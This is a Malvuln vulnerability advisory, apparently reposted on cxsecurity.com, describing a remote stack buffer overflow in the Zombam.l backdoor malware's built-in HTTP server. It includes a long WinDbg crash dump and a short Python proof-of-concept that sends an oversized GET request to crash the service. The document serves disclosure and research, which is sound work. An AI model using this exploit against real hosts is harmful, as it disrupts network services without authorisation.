BACKDOOR.WIN32.ZOMBAM.L / Remote Stack Buffer Overflow

2021.03.16
us malvuln (US) us
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/56d356c5b1ae3a91caac511179159034.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Zombam.l Vulnerability: Remote Stack Buffer Overflow Description: Zombam.l creates files to serve as backdoors the default name is "httpserver.exe" and listens on TCP port 80. Attackers who can reach the backdoor can send HTTP GET request of about 2000 bytes to trigger buffer overflow corrupting the stack and overwriting EDX register. Type: PE32 MD5: 56d356c5b1ae3a91caac511179159034 Vuln ID: MVID-2021-0129 Dropped files: httpserver.exe ASLR: False DEP: False Safe SEH: True Disclosure: 03/14/2021 Memory Dump: (d00.168): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=027cfa20 edx=41414141 esi=00000003 edi=00000003 eip=7710ed3c esp=027cf0bc ebp=027cf24c iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 7710ed3c c21400 ret 14h 0:005> .ecxr eax=027cf9f0 ebx=04190310 ecx=027cfa20 edx=41414141 esi=04190310 edi=004057e6 eip=004029e0 esp=027cf9d8 ebp=027cfa28 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 *** WARNING: Unable to verify checksum for httpserver.exe *** ERROR: Module load completed but symbols could not be loaded for httpserver.exe httpserver+0x29e0: 004029e0 8b4204 mov eax,dword ptr [edx+4] ds:002b:41414145=???????? 0:005> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: httpserver+29e0 004029e0 8b4204 mov eax,dword ptr [edx+4] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 004029e0 (httpserver+0x000029e0) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414145 Attempt to read from address 41414145 PROCESS_NAME: httpserver.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 41414145 READ_ADDRESS: 41414145 FOLLOWUP_IP: httpserver+29e0 004029e0 8b4204 mov eax,dword ptr [edx+4] MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000168 BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 00402574 to 004029e0 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 027cfa28 00402574 41414141 027cfa40 00000415 httpserver+0x29e0 027cfaa4 41414141 41414141 41414141 41414141 httpserver+0x2574 027cfaa8 41414141 41414141 41414141 41414141 0x41414141 027cfaac 41414141 41414141 41414141 41414141 0x41414141 027cfab0 41414141 41414141 41414141 41414141 0x41414141 027cfab4 41414141 41414141 41414141 41414141 0x41414141 027cfab8 41414141 41414141 41414141 41414141 0x41414141 027cfabc 41414141 41414141 41414141 41414141 0x41414141 027cfac0 41414141 41414141 41414141 41414141 0x41414141 027cfac4 41414141 41414141 41414141 41414141 0x41414141 027cfac8 41414141 41414141 41414141 41414141 0x41414141 027cfacc 41414141 41414141 41414141 41414141 0x41414141 027cfad0 41414141 41414141 41414141 41414141 0x41414141 027cfad4 41414141 41414141 41414141 41414141 0x41414141 027cfad8 41414141 41414141 41414141 41414141 0x41414141 027cfadc 41414141 41414141 41414141 41414141 0x41414141 027cfae0 41414141 41414141 41414141 41414141 0x41414141 027cfae4 41414141 41414141 41414141 41414141 0x41414141 027cfae8 41414141 41414141 41414141 41414141 0x41414141 027cfaec 41414141 41414141 41414141 41414141 0x41414141 027cfaf0 41414141 41414141 41414141 41414141 0x41414141 027cfaf4 41414141 41414141 41414141 41414141 0x41414141 027cfaf8 41414141 41414141 41414141 41414141 0x41414141 027cfafc 41414141 41414141 41414141 41414141 0x41414141 027cfb00 41414141 41414141 41414141 41414141 0x41414141 027cfb04 41414141 41414141 41414141 41414141 0x41414141 027cfb08 41414141 41414141 41414141 41414141 0x41414141 027cfb0c 41414141 41414141 41414141 41414141 0x41414141 027cfb10 41414141 41414141 41414141 41414141 0x41414141 027cfb14 41414141 41414141 41414141 41414141 0x41414141 027cfb18 41414141 41414141 41414141 41414141 0x41414141 027cfb1c 41414141 41414141 41414141 41414141 0x41414141 027cfb20 41414141 41414141 41414141 41414141 0x41414141 027cfb24 41414141 41414141 41414141 41414141 0x41414141 027cfb28 41414141 41414141 41414141 41414141 0x41414141 027cfb2c 41414141 41414141 41414141 41414141 0x41414141 027cfb30 41414141 41414141 41414141 41414141 0x41414141 027cfb34 41414141 41414141 41414141 41414141 0x41414141 027cfb38 41414141 41414141 41414141 41414141 0x41414141 027cfb3c 41414141 41414141 41414141 41414141 0x41414141 027cfb40 41414141 41414141 41414141 41414141 0x41414141 027cfb44 41414141 41414141 41414141 41414141 0x41414141 027cfb48 41414141 41414141 41414141 41414141 0x41414141 027cfb4c 41414141 41414141 41414141 41414141 0x41414141 027cfb50 41414141 41414141 41414141 41414141 0x41414141 027cfb54 41414141 41414141 41414141 41414141 0x41414141 027cfb58 41414141 41414141 41414141 41414141 0x41414141 027cfb5c 41414141 41414141 41414141 41414141 0x41414141 027cfb60 41414141 41414141 41414141 41414141 0x41414141 027cfb64 41414141 41414141 41414141 41414141 0x41414141 027cfb68 41414141 41414141 41414141 41414141 0x41414141 027cfb6c 41414141 41414141 41414141 41414141 0x41414141 027cfb70 41414141 41414141 41414141 41414141 0x41414141 027cfb74 41414141 41414141 41414141 41414141 0x41414141 027cfb78 41414141 41414141 41414141 41414141 0x41414141 027cfb7c 41414141 41414141 41414141 41414141 0x41414141 027cfb80 41414141 41414141 41414141 41414141 0x41414141 027cfb84 41414141 41414141 41414141 41414141 0x41414141 027cfb88 41414141 41414141 41414141 41414141 0x41414141 027cfb8c 41414141 41414141 41414141 41414141 0x41414141 027cfb90 41414141 41414141 41414141 41414141 0x41414141 027cfb94 41414141 41414141 41414141 41414141 0x41414141 027cfb98 41414141 41414141 41414141 41414141 0x41414141 027cfb9c 41414141 41414141 41414141 41414141 0x41414141 027cfba0 41414141 41414141 41414141 41414141 0x41414141 027cfba4 41414141 41414141 41414141 41414141 0x41414141 027cfba8 41414141 41414141 41414141 41414141 0x41414141 027cfbac 41414141 41414141 41414141 41414141 0x41414141 027cfbb0 41414141 41414141 41414141 41414141 0x41414141 027cfbb4 41414141 41414141 41414141 41414141 0x41414141 027cfbb8 41414141 41414141 41414141 41414141 0x41414141 027cfbbc 41414141 41414141 41414141 41414141 0x41414141 027cfbc0 41414141 41414141 41414141 41414141 0x41414141 027cfbc4 41414141 41414141 41414141 41414141 0x41414141 027cfbc8 41414141 41414141 41414141 41414141 0x41414141 027cfbcc 41414141 41414141 41414141 41414141 0x41414141 027cfbd0 41414141 41414141 41414141 41414141 0x41414141 027cfbd4 41414141 41414141 41414141 41414141 0x41414141 027cfbd8 41414141 41414141 41414141 41414141 0x41414141 027cfbdc 41414141 41414141 41414141 41414141 0x41414141 027cfbe0 41414141 41414141 41414141 41414141 0x41414141 027cfbe4 41414141 41414141 41414141 41414141 0x41414141 027cfbe8 41414141 41414141 41414141 41414141 0x41414141 027cfbec 41414141 41414141 41414141 41414141 0x41414141 027cfbf0 41414141 41414141 41414141 41414141 0x41414141 027cfbf4 41414141 41414141 41414141 41414141 0x41414141 027cfbf8 41414141 41414141 41414141 41414141 0x41414141 027cfbfc 41414141 41414141 41414141 41414141 0x41414141 027cfc00 41414141 41414141 41414141 41414141 0x41414141 027cfc04 41414141 41414141 41414141 41414141 0x41414141 027cfc08 41414141 41414141 41414141 41414141 0x41414141 027cfc0c 41414141 41414141 41414141 41414141 0x41414141 027cfc10 41414141 41414141 41414141 41414141 0x41414141 027cfc14 41414141 41414141 41414141 41414141 0x41414141 027cfc18 41414141 41414141 41414141 41414141 0x41414141 027cfc1c 41414141 41414141 41414141 41414141 0x41414141 027cfc20 41414141 41414141 41414141 41414141 0x41414141 027cfc24 41414141 41414141 41414141 41414141 0x41414141 027cfc28 41414141 41414141 41414141 41414141 0x41414141 027cfc2c 41414141 41414141 41414141 41414141 0x41414141 027cfc30 41414141 41414141 41414141 41414141 0x41414141 027cfc34 41414141 41414141 41414141 41414141 0x41414141 027cfc38 41414141 41414141 41414141 41414141 0x41414141 027cfc3c 41414141 41414141 41414141 41414141 0x41414141 027cfc40 41414141 41414141 41414141 41414141 0x41414141 027cfc44 41414141 41414141 41414141 41414141 0x41414141 027cfc48 41414141 41414141 41414141 41414141 0x41414141 027cfc4c 41414141 41414141 41414141 41414141 0x41414141 027cfc50 41414141 41414141 41414141 41414141 0x41414141 027cfc54 41414141 41414141 41414141 41414141 0x41414141 027cfc58 41414141 41414141 41414141 41414141 0x41414141 027cfc5c 41414141 41414141 41414141 41414141 0x41414141 027cfc60 41414141 41414141 41414141 41414141 0x41414141 027cfc64 41414141 41414141 41414141 41414141 0x41414141 027cfc68 41414141 41414141 41414141 41414141 0x41414141 027cfc6c 41414141 41414141 41414141 41414141 0x41414141 027cfc70 41414141 41414141 41414141 41414141 0x41414141 027cfc74 41414141 41414141 41414141 41414141 0x41414141 027cfc78 41414141 41414141 41414141 41414141 0x41414141 027cfc7c 41414141 41414141 41414141 41414141 0x41414141 027cfc80 41414141 41414141 41414141 41414141 0x41414141 027cfc84 41414141 41414141 41414141 41414141 0x41414141 027cfc88 41414141 41414141 41414141 41414141 0x41414141 027cfc8c 41414141 41414141 41414141 41414141 0x41414141 027cfc90 41414141 41414141 41414141 41414141 0x41414141 027cfc94 41414141 41414141 41414141 41414141 0x41414141 027cfc98 41414141 41414141 41414141 41414141 0x41414141 027cfc9c 41414141 41414141 41414141 41414141 0x41414141 027cfca0 41414141 41414141 41414141 41414141 0x41414141 027cfca4 41414141 41414141 41414141 41414141 0x41414141 027cfca8 41414141 41414141 41414141 41414141 0x41414141 027cfcac 41414141 41414141 41414141 41414141 0x41414141 027cfcb0 41414141 41414141 41414141 41414141 0x41414141 027cfcb4 41414141 41414141 41414141 41414141 0x41414141 027cfcb8 41414141 41414141 41414141 41414141 0x41414141 027cfcbc 41414141 41414141 41414141 41414141 0x41414141 027cfcc0 41414141 41414141 41414141 41414141 0x41414141 027cfcc4 41414141 41414141 41414141 41414141 0x41414141 027cfcc8 41414141 41414141 41414141 41414141 0x41414141 027cfccc 41414141 41414141 41414141 41414141 0x41414141 027cfcd0 41414141 41414141 41414141 41414141 0x41414141 027cfcd4 41414141 41414141 41414141 41414141 0x41414141 027cfcd8 41414141 41414141 41414141 41414141 0x41414141 027cfcdc 41414141 41414141 41414141 41414141 0x41414141 027cfce0 41414141 41414141 41414141 41414141 0x41414141 027cfce4 41414141 41414141 41414141 41414141 0x41414141 027cfce8 41414141 41414141 41414141 41414141 0x41414141 027cfcec 41414141 41414141 41414141 41414141 0x41414141 027cfcf0 41414141 41414141 41414141 41414141 0x41414141 027cfcf4 41414141 41414141 41414141 41414141 0x41414141 027cfcf8 41414141 41414141 41414141 41414141 0x41414141 027cfcfc 41414141 41414141 41414141 41414141 0x41414141 027cfd00 41414141 41414141 41414141 41414141 0x41414141 027cfd04 41414141 41414141 41414141 41414141 0x41414141 027cfd08 41414141 41414141 41414141 41414141 0x41414141 027cfd0c 41414141 41414141 41414141 41414141 0x41414141 027cfd10 41414141 41414141 41414141 41414141 0x41414141 027cfd14 41414141 41414141 41414141 41414141 0x41414141 027cfd18 41414141 41414141 41414141 41414141 0x41414141 027cfd1c 41414141 41414141 41414141 41414141 0x41414141 027cfd20 41414141 41414141 41414141 41414141 0x41414141 027cfd24 41414141 41414141 41414141 41414141 0x41414141 027cfd28 41414141 41414141 41414141 41414141 0x41414141 027cfd2c 41414141 41414141 41414141 41414141 0x41414141 027cfd30 41414141 41414141 41414141 41414141 0x41414141 027cfd34 41414141 41414141 41414141 41414141 0x41414141 027cfd38 41414141 41414141 41414141 41414141 0x41414141 027cfd3c 41414141 41414141 41414141 41414141 0x41414141 027cfd40 41414141 41414141 41414141 41414141 0x41414141 027cfd44 41414141 41414141 41414141 41414141 0x41414141 027cfd48 41414141 41414141 41414141 41414141 0x41414141 027cfd4c 41414141 41414141 41414141 41414141 0x41414141 027cfd50 41414141 41414141 41414141 41414141 0x41414141 027cfd54 41414141 41414141 41414141 41414141 0x41414141 027cfd58 41414141 41414141 41414141 41414141 0x41414141 027cfd5c 41414141 41414141 41414141 41414141 0x41414141 027cfd60 41414141 41414141 41414141 41414141 0x41414141 027cfd64 41414141 41414141 41414141 41414141 0x41414141 027cfd68 41414141 41414141 41414141 41414141 0x41414141 027cfd6c 41414141 41414141 41414141 41414141 0x41414141 027cfd70 41414141 41414141 41414141 41414141 0x41414141 027cfd74 41414141 41414141 41414141 41414141 0x41414141 027cfd78 41414141 41414141 41414141 41414141 0x41414141 027cfd7c 41414141 41414141 41414141 41414141 0x41414141 027cfd80 41414141 41414141 41414141 41414141 0x41414141 027cfd84 41414141 41414141 41414141 41414141 0x41414141 027cfd88 41414141 41414141 41414141 41414141 0x41414141 027cfd8c 41414141 41414141 41414141 41414141 0x41414141 027cfd90 41414141 41414141 41414141 41414141 0x41414141 027cfd94 41414141 41414141 41414141 41414141 0x41414141 027cfd98 41414141 41414141 41414141 41414141 0x41414141 027cfd9c 41414141 41414141 41414141 41414141 0x41414141 027cfda0 41414141 41414141 41414141 41414141 0x41414141 027cfda4 41414141 41414141 41414141 41414141 0x41414141 027cfda8 41414141 41414141 41414141 41414141 0x41414141 027cfdac 41414141 41414141 41414141 41414141 0x41414141 027cfdb0 41414141 41414141 41414141 41414141 0x41414141 027cfdb4 41414141 41414141 41414141 41414141 0x41414141 027cfdb8 41414141 41414141 41414141 41414141 0x41414141 027cfdbc 41414141 41414141 41414141 41414141 0x41414141 027cfdc0 41414141 41414141 41414141 41414141 0x41414141 027cfdc4 41414141 41414141 41414141 41414141 0x41414141 027cfdc8 41414141 41414141 41414141 41414141 0x41414141 027cfdcc 41414141 41414141 41414141 41414141 0x41414141 027cfdd0 41414141 41414141 41414141 41414141 0x41414141 027cfdd4 41414141 41414141 41414141 41414141 0x41414141 027cfdd8 41414141 41414141 41414141 41414141 0x41414141 027cfddc 41414141 41414141 41414141 41414141 0x41414141 027cfde0 41414141 41414141 41414141 41414141 0x41414141 027cfde4 41414141 41414141 41414141 41414141 0x41414141 027cfde8 41414141 41414141 41414141 41414141 0x41414141 027cfdec 41414141 41414141 41414141 41414141 0x41414141 027cfdf0 41414141 41414141 41414141 41414141 0x41414141 027cfdf4 41414141 41414141 41414141 41414141 0x41414141 027cfdf8 41414141 41414141 41414141 41414141 0x41414141 027cfdfc 41414141 41414141 41414141 41414141 0x41414141 027cfe00 41414141 41414141 41414141 41414141 0x41414141 027cfe04 41414141 41414141 41414 STACK_COMMAND: ~5s; .ecxr ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: httpserver+29e0 FOLLOWUP_NAME: MachineOwner MODULE_NAME: httpserver IMAGE_NAME: httpserver.exe DEBUG_FLR_IMAGE_TIMESTAMP: 3f0668f2 FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_httpserver.exe!Unknown BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_httpserver+29e0 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=80 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) JUNK="A"*2000 PAYLOAD="GET /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n" s.send(PAYLOAD) s.close() print("Backdoor.Win32.Zombam.l / Remote Stack Buffer Overflow") print("MD5: 56d356c5b1ae3a91caac511179159034") print("BY Malvuln") if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top